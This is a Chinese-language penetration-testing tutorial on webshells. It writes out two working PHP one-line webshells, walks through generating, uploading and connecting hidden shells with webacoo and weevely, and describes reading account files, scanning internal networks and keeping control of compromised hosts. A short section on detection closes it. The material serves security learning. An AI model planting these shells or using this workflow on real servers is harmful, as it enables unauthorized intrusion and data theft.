渗透测试之Webshell

简介

Webshell是通过服务器开放的端口获取服务器的某些权限。它又称脚本木马,一般分为大马、小马、一句话木马。

大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。

小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。

一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell。

产生原因

Webshell正常肯定不是开发者想主动留下的,而且也比较少遇到现成的Webshell。多数情况下,我们使用的Webshell是利用文件上传漏洞、SQL注入漏洞、RCE漏洞等,将恶意文件放到web服务器中生成的。

这个生成的Webshell也就是常说的”后门”,之后通过这个Webshell可以进行文件管理、数据库管理、远程命令执行、提权等恶意操作。

一句话木马

这里介绍两种比较常见的一句话木马。

这是php语法的一句话木马:

<?php eval(@$_POST['value']);?>
<?php echo shell_exec($_GET['cmd']);?>

看一下第一种php的一句话木马:

渗透测试之Webshell

php的第一种木马

具体语法用处就不解释了,感兴趣的可以查一下基础教程。等看到后面的WebShell管理工具的内容,你就会知道这种一句话木马其实都是可以通过工具生成的,没必要了解具体的语法。

这种木马使用也很方便,只要将需要执行的php代码,通过post形式的接口传入就行:

渗透测试之Webshell

利用木马执行php代码

第二种木马:

渗透测试之Webshell

第二种木马的使用方法:

渗透测试之Webshell

利用木马执行命令

WebShell管理工具

网上有挺多WebShell管理工具的,这些管理工具可以用来生成隐蔽性比较强的木马,并比较方便的连接木马进行渗透。这里简单罗列一些WebShell管理工具:

  • webacoo
  • Cknife
  • antSword
  • 冰蝎
  • weevely
  • Altman
  • Webshell
  • quasibot

这些工具中有些是Windows环境的工具,有些是Linux环境的工具。看个人需要来选择要使用哪种工具吧。Cknife在以前业内挺有名,中文名叫中国菜刀,不是很确定还有没在更新。

你们在挑选使用的工具时,要确认一下是否还有维护,还有更新记录。去官网或者源头下载,别使用第三方定制过的,很容易中毒。

WebShell管理工具-webacoo

webacoo是Linux环境下的命令行工具,在Kali中安装的话直接输入webacoo就可以:

渗透测试之Webshell

webacoo安装

在这里特意介绍webacoo,主要是因为它有这些优点:

  • 编码通信内容通过cookie头传输,隐蔽性强
  • 使用方便

先来看一下帮助文档:

渗透测试之Webshell

webacoo -h

不对所有参数做介绍了,就用webacoo演示一遍渗透过程吧。

生成木马文件:

渗透测试之Webshell

webacoo -g -o a.php

参数-g的作用是生成木马文件,这个参数需要和-o参数一起使用。

参数-o的作用是指定输出的文件名。

可以看到生成的木马文件内容是经过编码的:

渗透测试之Webshell

生成的木马文件

将这个木马文件通过其他可以传输文件的漏洞传给目标服务器,这里利用文件上传漏洞:

渗透测试之Webshell

将木马文件传给目标机器

在攻击机上连接目标主机:

渗透测试之Webshell

连接目标主机

可以从左侧的文字看出,已经不在当前攻击机的Linux终端了。

其中的参数-t表示将webacoo作为客户端使用,-u表示要连接的服务器文件地址。

连接成功后已经能做很多操作了,比如提权、取证等:

渗透测试之Webshell

渗透成功后的操作

用wireshark抓包看一下请求的执行:

渗透测试之Webshell

请求的数据

可以看到请求的数据被携带在cookie中,且经过了默认的base64编码。

cm是base64编码的命令,cn是服务器用于返回数据的cookie头的名,cp是返回信息定界符。

可以通过对cm的内容进行解码,确认所传的命令是不是我们输入的:

渗透测试之Webshell

对命令解码

webacoo还有一些比较实用的参数,比如不对木马进行混淆编译的-r、指定木马使用函数方法的-f、指定返回内容携带在cookie哪个名称中的-c、指定代理的-p等等。

WebShell管理工具-weevely

weevely是预装在Kali中的,所以使用Kali的同学不用进行安装。它是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。

weevely有30多个管理模块,可以做到很多事情:

  • 执行系统命令、浏览系统文件;
  • 检查服务器常见配置错误;
  • 创建正向、反向TCP Shell连接;
  • 通过目标计算机代理HTTP流量;
  • 从目标计算机运行端口扫描、渗透内容。

weevely还支持通过密码连接,这样就不容易出现自己好不容易渗透控制的肉鸡,第二天就被人摘了桃子的情况。

先看一下帮助文档:

渗透测试之Webshell

weevely的帮助文档

下面演示一下渗透操作。生成木马文件:

渗透测试之Webshell

生成的木马文件

将木马文件传给目标主机:

渗透测试之Webshell

将木马文件传给目标机器

在攻击机上连接目标主机:

渗透测试之Webshell

连接目标主机

在连接上目标主机后,可以通过输入help命令,查看前面提到的那些丰富的管理模块:

渗透测试之Webshell

提供的管理模块

如果你在执行了help后没有管理模块显示,那可能是少装了一个python的三方库pysocks。直接通过pip应该会失败,可以去仓库下载源码包,手动安装,源码包地址:

https://pypi.python.org/pypi/PySocks/

将源码包放到攻击机后,到解压后的目录执行安装命令:

渗透测试之Webshell

安装pysocks

安装成功后,就能正常使用weevely的管理模块了。

查找目标系统中的弱权限隐患:

渗透测试之Webshell

audit_filesystem

查找账户文件:

渗透测试之Webshell

audit_etcpasswd

这个其实自己通过命令也能很容易查找到,就是不知道weevely是直接查的固定文件,还是查了etc里面的所有文件。

用目标主机扫描内网其他主机:

渗透测试之Webshell

扫描命令的使用说明

管理模块很多,这里就不全部演示了,感兴趣可以看帮助文档。

WebShell的防护

一般可以通过静态检测和动态检测来防止被webshell渗透。

静态检测主要是指对web日志的检查,进行文本特征匹配、统计特征计算与文件关联性分析,最后对检测结果汇总,列出疑似的Webshell文件。例如,网站目录下某php文件访问量很少,且来源ip固定。

动态检查主要是指监控webshell执行时刻表现出来的特征。例如,webshell如果执行系统命令的话,会有进程,我们只要实时监控可疑进程就行。

总结

作为攻击者,要进行webshell渗透,主要是考虑如何绕过系统上传webshell,如何隐藏webshell免查杀;作为防御者,为了安全,应该考虑如何避免webshell被上传,如何查杀webshell。

发表评论
留言与评论(共有 0 条评论) “”
   
验证码:

相关文章

推荐文章